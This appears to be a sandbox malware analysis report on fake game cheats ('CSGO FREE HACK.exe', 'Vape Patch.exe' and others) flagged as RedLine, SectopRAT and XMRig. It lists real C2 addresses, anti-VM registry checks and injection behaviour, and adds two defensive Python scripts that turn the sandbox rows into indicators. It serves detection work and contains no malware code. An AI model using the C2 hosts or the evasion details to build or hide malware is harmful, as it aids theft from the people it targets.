Malware Analysis Report

2024-11-13 15:41

Sample ID 241109-ty4zcaxgrc
Target d42bb7f95b50972680b8a5f2f68ab5bee5450fc45cf15612d45cc00b1b65f0c2
SHA256 d42bb7f95b50972680b8a5f2f68ab5bee5450fc45cf15612d45cc00b1b65f0c2
Tags
spyware stealer redline sectoprat boss9 discovery infostealer rat trojan @krxstkrxst evasion themida @navi_gator rich @bestieffcs defense_evasion mercurialgrabber ninja0812 @killyxu asap execution xmrig miner
score
10/10

Analysis Overview

score
10/10

SHA256

d42bb7f95b50972680b8a5f2f68ab5bee5450fc45cf15612d45cc00b1b65f0c2

Threat Level: Known bad

The file d42bb7f95b50972680b8a5f2f68ab5bee5450fc45cf15612d45cc00b1b65f0c2 was found to be: Known bad.

Malicious Activity Summary

Mercurial Grabber Stealer

SectopRAT

RedLine payload

Mercurialgrabber family

Redline family

Xmrig family

SectopRAT payload

xmrig

RedLine

Sectoprat family

Looks for VirtualBox Guest Additions in registry

XMRig Miner payload

Identifies VirtualBox via ACPI registry values (likely anti-VM)

System Binary Proxy Execution: Regsvcs/Regasm

Command and Scripting Interpreter: PowerShell

Looks for VMWare Tools registry key

Executes dropped EXE

Checks BIOS information in registry

Checks computer location settings

Loads dropped DLL

Themida packer

Reads user/profile data of web browsers

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Checks whether UAC is enabled

Maps connected drives based on registry

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Unsigned PE

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Browser Information Discovery

Program crash

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Uses Task Scheduler COM API

Checks processor information in registry

Suspicious use of UnmapMainImage

Scheduled Task/Job: Scheduled Task

Suspicious behavior: EnumeratesProcesses

Modifies system certificate store

Checks SCSI registry key(s)

Enumerates system info in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-11-09 16:29

Signatures

Mercurialgrabber family

mercurialgrabber

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral15

Detonation Overview

Submitted: 2024-11-09 16:28
Reported: 2024-11-09 16:31
Platform: win7-20240903-en
Max time kernel: 133s
Max time network: 150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Kiddions Mod MENU.exe"

Signatures

Reads user/profile data of web browsers

spyware stealer

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\Kiddions Mod MENU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\Kiddions Mod MENU.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Kiddions Mod MENU.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Kiddions Mod MENU.exe

"C:\Users\Admin\AppData\Local\Temp\Kiddions Mod MENU.exe"

Network

Country Destination Domain Proto
NL 185.182.82.35:4420 tcp
NL 185.182.82.35:4420 tcp
NL 185.182.82.35:4420 tcp
NL 185.182.82.35:4420 tcp
NL 185.182.82.35:4420 tcp
NL 185.182.82.35:4420 tcp
NL 185.182.82.35:4420 tcp

Files

memory/2936-0-0x000007FEF62E3000-0x000007FEF62E4000-memory.dmp

memory/2936-1-0x0000000000010000-0x000000000003A000-memory.dmp

memory/2936-2-0x000007FEF62E0000-0x000007FEF6CCC000-memory.dmp

memory/2936-21-0x000007FEF62E3000-0x000007FEF62E4000-memory.dmp

memory/2936-22-0x000007FEF62E0000-0x000007FEF6CCC000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted: 2024-11-09 16:28
Reported: 2024-11-09 16:31
Platform: win7-20240903-en
Max time kernel: 130s
Max time network: 141s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2492 set thread context of 2988 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2492 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
PID 2492 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
PID 2492 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
PID 2492 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
PID 2492 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
PID 2492 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
PID 2492 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
PID 2492 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
PID 2492 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
PID 2492 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
PID 2492 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
PID 2492 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe

"C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe"

C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe

"C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe"

Network

Country Destination Domain Proto
RU 109.248.201.150:63757 tcp
RU 109.248.201.150:63757 tcp
RU 109.248.201.150:63757 tcp
RU 109.248.201.150:63757 tcp
RU 109.248.201.150:63757 tcp

Files

memory/2492-0-0x000000007411E000-0x000000007411F000-memory.dmp

memory/2492-1-0x00000000011C0000-0x0000000001304000-memory.dmp

memory/2492-2-0x0000000074110000-0x00000000747FE000-memory.dmp

memory/2492-3-0x000000007411E000-0x000000007411F000-memory.dmp

memory/2492-4-0x0000000074110000-0x00000000747FE000-memory.dmp

memory/2492-5-0x00000000003F0000-0x0000000000412000-memory.dmp

memory/2988-10-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2988-12-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2988-6-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2988-8-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2988-11-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2988-14-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2988-21-0x0000000074110000-0x00000000747FE000-memory.dmp

memory/2492-20-0x0000000074110000-0x00000000747FE000-memory.dmp

memory/2988-19-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2988-16-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2988-22-0x0000000074110000-0x00000000747FE000-memory.dmp

memory/2988-23-0x0000000074110000-0x00000000747FE000-memory.dmp

Analysis: behavioral22

Detonation Overview

Submitted: 2024-11-09 16:28
Reported: 2024-11-09 16:31
Platform: win10v2004-20241007-en
Max time kernel: 149s
Max time network: 155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Sectoprat family

sectoprat

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3972 set thread context of 1612 N/A C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe

"C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe"

C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe

"C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 73.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 8.173.189.20.in-addr.arpa udp
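The table above is mostly repeats: a forward lookup for jonaianell.xyz retried roughly thirty times, plus a handful of PTR (in-addr.arpa) lookups that Windows and the sandbox network stack generate on their own. The other runs mix rows of this kind with direct TCP connections (for example 136.244.80.139:40533 in behavioral3 and behavioral4, 109.248.201.150:63757 in behavioral17). The script below deduplicates rows of this layout into block-list entries and separates the PTR noise from real indicators. It is an added example written for this page, not output from the sandbox; SAMPLE_ROWS is a constructed subset of the rows in this report, and the bucket names are my own.

```python
"""Deduplicate the 'Network' rows of this report into actionable indicators.

Added example (not generated by the sandbox). Row layout follows the tables
in this report: "Country Destination Domain Proto", where Domain is only
present for DNS queries, so TCP rows have one column fewer.
"""
import ipaddress
import re
from collections import Counter
from typing import List, Optional

# Constructed subset of rows copied from the behavioral22, behavioral4 and
# behavioral17 tables in this report; the real tables repeat rows many times.
SAMPLE_ROWS = """\
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
DE 136.244.80.139:40533 tcp
DE 136.244.80.139:40533 tcp
RU 109.248.201.150:63757 tcp
"""

ROW_RE = re.compile(
    r"^(?P<cc>[A-Z]{2})\s+"
    r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+)\s+"
    r"(?:(?P<domain>\S+)\s+)?"      # Domain column is absent on TCP rows
    r"(?P<proto>tcp|udp)$"
)


def ptr_to_ip(name: str) -> Optional[str]:
    """Turn a PTR name like 241.150.49.20.in-addr.arpa into 20.49.150.241.

    Returns None for anything that is not a well-formed IPv4 reverse name.
    """
    suffix = ".in-addr.arpa"
    if not name.endswith(suffix):
        return None
    octets = name[: -len(suffix)].split(".")
    if len(octets) != 4:
        return None
    try:
        return str(ipaddress.IPv4Address(".".join(reversed(octets))))
    except ipaddress.AddressValueError:
        return None


def summarise(rows: str) -> dict:
    """Bucket rows into direct connections, forward DNS queries and PTR lookups.

    PTR lookups are usually OS/sandbox background noise; forward queries and
    direct TCP connections are the rows worth blocking or hunting for.
    """
    connections: Counter = Counter()      # (ip, port, proto) -> hit count
    dns_queries: Counter = Counter()      # queried name -> query count
    reverse_lookups: Counter = Counter()  # IP that was reverse-resolved -> count
    skipped = 0
    for line in rows.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            skipped += 1
            continue
        ip, port, proto, domain = m["ip"], int(m["port"]), m["proto"], m["domain"]
        if proto == "udp" and port == 53 and domain:
            resolved = ptr_to_ip(domain)
            if resolved:
                reverse_lookups[resolved] += 1
            else:
                dns_queries[domain.lower()] += 1
        else:
            connections[(ip, port, proto)] += 1
    return {
        "connections": connections,
        "dns_queries": dns_queries,
        "reverse_lookups": reverse_lookups,
        "skipped": skipped,
    }


def iocs(summary: dict) -> List[str]:
    """Flatten the summary into block-list style strings, most-hit first."""
    out = [f"{ip}:{port}/{proto}"
           for (ip, port, proto), _ in summary["connections"].most_common()]
    out += [f"dns:{name}" for name, _ in summary["dns_queries"].most_common()]
    return out


if __name__ == "__main__":
    s = summarise(SAMPLE_ROWS)
    for entry in iocs(s):
        print(entry)
    print("background PTR lookups (not indicators):", dict(s["reverse_lookups"]))
```

Repeated queries for a single name with no TCP connection following are consistent with a C2 domain that no longer resolved at detonation time; the name is still worth a retro-hunt through DNS logs. The PTR bucket is kept only so the analyst can see what was excluded.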

Files

memory/3972-0-0x0000000074BDE000-0x0000000074BDF000-memory.dmp

memory/3972-1-0x0000000000B50000-0x0000000000BB4000-memory.dmp

memory/3972-2-0x0000000005560000-0x00000000055D6000-memory.dmp

memory/3972-3-0x00000000054E0000-0x00000000054FE000-memory.dmp

memory/3972-4-0x0000000074BD0000-0x0000000075380000-memory.dmp

memory/3972-5-0x0000000005D00000-0x00000000062A4000-memory.dmp

memory/1612-6-0x0000000000400000-0x000000000041E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Vape Patch.exe.log

MD5 e5352797047ad2c91b83e933b24fbc4f
SHA1 9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772
SHA256 b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c
SHA512 dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827

memory/1612-9-0x0000000005450000-0x0000000005A68000-memory.dmp

memory/3972-10-0x0000000074BD0000-0x0000000075380000-memory.dmp

memory/1612-12-0x0000000074BD0000-0x0000000075380000-memory.dmp

memory/1612-11-0x0000000004F60000-0x0000000004F72000-memory.dmp

memory/1612-13-0x0000000005000000-0x000000000503C000-memory.dmp

memory/1612-14-0x0000000005040000-0x000000000508C000-memory.dmp

memory/1612-15-0x0000000074BD0000-0x0000000075380000-memory.dmp

memory/1612-16-0x00000000052B0000-0x00000000053BA000-memory.dmp

memory/1612-17-0x0000000074BD0000-0x0000000075380000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted: 2024-11-09 16:28
Reported: 2024-11-09 16:31
Platform: win7-20241023-en
Max time kernel: 140s
Max time network: 146s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Bird.exe"

Signatures

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Sectoprat family

sectoprat

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\Bird.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\Bird.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\Bird.exe N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\Bird.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bird.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Bird.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bird.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Bird.exe N/A
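The ACPI, BIOS, EnableLUA and NLS\Language rows above are individually weak signals; what a triage analyst wants is the mapping from raw key path to the technique it implies, computed over the whole table rather than read row by row. The classifier below is an added example written for this page, not code from the sandbox vendor. The rule table and category names are my own; SAMPLE_ROWS is copied from the behavioral1 and behavioral15 tables in this report with one constructed benign .NET key appended so that the fall-through bucket is exercised; the ATT&CK IDs are the standard ones for virtualization system checks (T1497.001), Query Registry (T1012), System Language Discovery (T1614.001) and System Information Discovery (T1082).

```python
"""Classify the registry accesses a sandbox attributed to a sample.

Added example, not part of the sandbox report. Input rows follow the tables
above: "Key opened <key> <process> N/A" and
"Key value queried <key> <process> N/A".
"""
import re
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional

# Constructed from the behavioral1 (Bird.exe) and behavioral15 (Kiddions Mod
# MENU.exe) rows in this report, plus one made-up benign .NET key at the end.
SAMPLE_ROWS = r"""
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\Bird.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\Bird.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\Bird.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\Bird.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Bird.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\Kiddions Mod MENU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\Kiddions Mod MENU.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\.NETFramework C:\Users\Admin\AppData\Local\Temp\Bird.exe N/A
"""

# Process paths may contain spaces, so the image is matched lazily up to ".exe".
ROW_RE = re.compile(
    r"^(?P<action>Key opened|Key value queried)\s+"
    r"(?P<key>\\REGISTRY\\\S+)\s+"
    r"(?P<proc>.+?\.exe)\s+(?P<target>\S+)$",
    re.IGNORECASE,
)

# (pattern on the key path, category, ATT&CK technique). First match wins.
RULES = [
    (re.compile(r"\\ACPI\\DSDT\\VBOX__$", re.I), "anti-vm", "T1497.001"),
    (re.compile(r"\\HARDWARE\\DESCRIPTION\\System\\(System|Video)BiosVersion$", re.I),
     "anti-vm", "T1497.001"),
    (re.compile(r"\\Policies\\System\\EnableLUA$", re.I), "uac-check", "T1012"),
    (re.compile(r"\\Control\\NLS\\Language$", re.I), "language-discovery", "T1614.001"),
    (re.compile(r"\\CentralProcessor\\\d+(\\ProcessorNameString)?$", re.I),
     "cpu-discovery", "T1082"),
]


@dataclass
class Finding:
    action: str
    key: str
    process: str
    category: str
    technique: Optional[str]


def categorise(rows: str) -> List[Finding]:
    """Parse the sandbox rows and tag each key access with a category."""
    findings: List[Finding] = []
    for line in rows.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue  # blank or non-registry row
        category, technique = "other", None
        for pattern, cat, tech in RULES:
            if pattern.search(m["key"]):
                category, technique = cat, tech
                break
        findings.append(Finding(m["action"], m["key"], m["proc"], category, technique))
    return findings


def by_category(findings: List[Finding]) -> Counter:
    return Counter(f.category for f in findings)


def evasion_verdict(findings: List[Finding]) -> str:
    """Any anti-vm hit means the sample fingerprints its host before doing
    anything interesting, so behaviour seen on a stock VM may be incomplete."""
    if by_category(findings)["anti-vm"]:
        return "fingerprints hypervisor (ACPI/BIOS strings); rerun on a hardened VM"
    return "no hypervisor fingerprinting seen"


if __name__ == "__main__":
    found = categorise(SAMPLE_ROWS)
    for f in found:
        print(f"{f.category:<20} {f.technique or '-':<10} {f.key}")
    print(dict(by_category(found)))
    print(evasion_verdict(found))
```

The VBOX__ name is what VirtualBox writes into its ACPI table headers, and the SystemBiosVersion/VideoBiosVersion strings are the usual place to look for hypervisor vendor names, so these three rows together are a deliberate hypervisor check rather than incidental registry use. In this run the check did not stop the sample from attempting connections to 65.21.103.71:56458 (see Network below), but a sample that reads these keys should still be rerun on a hardened or bare-metal host before its behaviour is treated as complete.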

Processes

C:\Users\Admin\AppData\Local\Temp\Bird.exe

"C:\Users\Admin\AppData\Local\Temp\Bird.exe"

Network

Country Destination Domain Proto
FI 65.21.103.71:56458 tcp
FI 65.21.103.71:56458 tcp
FI 65.21.103.71:56458 tcp
FI 65.21.103.71:56458 tcp
FI 65.21.103.71:56458 tcp
FI 65.21.103.71:56458 tcp

Files

memory/1972-0-0x00000000008B0000-0x0000000000F0E000-memory.dmp

memory/1972-1-0x00000000763F1000-0x00000000763F2000-memory.dmp

memory/1972-14-0x00000000763E0000-0x00000000764F0000-memory.dmp

memory/1972-20-0x00000000763E0000-0x00000000764F0000-memory.dmp

memory/1972-19-0x00000000763E0000-0x00000000764F0000-memory.dmp

memory/1972-18-0x00000000763E0000-0x00000000764F0000-memory.dmp

memory/1972-17-0x00000000763E0000-0x00000000764F0000-memory.dmp

memory/1972-16-0x00000000763E0000-0x00000000764F0000-memory.dmp

memory/1972-15-0x00000000763E0000-0x00000000764F0000-memory.dmp

memory/1972-13-0x00000000763E0000-0x00000000764F0000-memory.dmp

memory/1972-12-0x00000000763E0000-0x00000000764F0000-memory.dmp

memory/1972-11-0x00000000763E0000-0x00000000764F0000-memory.dmp

memory/1972-10-0x00000000763E0000-0x00000000764F0000-memory.dmp

memory/1972-9-0x00000000763E0000-0x00000000764F0000-memory.dmp

memory/1972-8-0x00000000763E0000-0x00000000764F0000-memory.dmp

memory/1972-7-0x00000000763E0000-0x00000000764F0000-memory.dmp

memory/1972-6-0x00000000763E0000-0x00000000764F0000-memory.dmp

memory/1972-5-0x00000000763E0000-0x00000000764F0000-memory.dmp

memory/1972-4-0x00000000763E0000-0x00000000764F0000-memory.dmp

memory/1972-3-0x00000000763E0000-0x00000000764F0000-memory.dmp

memory/1972-2-0x00000000763E0000-0x00000000764F0000-memory.dmp

memory/1972-25-0x00000000763E0000-0x00000000764F0000-memory.dmp

memory/1972-26-0x00000000763E0000-0x00000000764F0000-memory.dmp

memory/1972-27-0x00000000763E0000-0x00000000764F0000-memory.dmp

memory/1972-28-0x00000000008B0000-0x0000000000F0E000-memory.dmp

memory/1972-29-0x00000000008B0000-0x0000000000F0E000-memory.dmp

memory/1972-30-0x00000000763F1000-0x00000000763F2000-memory.dmp

memory/1972-31-0x00000000763E0000-0x00000000764F0000-memory.dmp

memory/1972-33-0x00000000763E0000-0x00000000764F0000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted: 2024-11-09 16:28
Reported: 2024-11-09 16:31
Platform: win7-20240903-en
Max time kernel: 137s
Max time network: 151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2596 set thread context of 2316 N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2596 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe
PID 2596 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe
PID 2596 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe
PID 2596 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe
PID 2596 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe
PID 2596 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe
PID 2596 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe
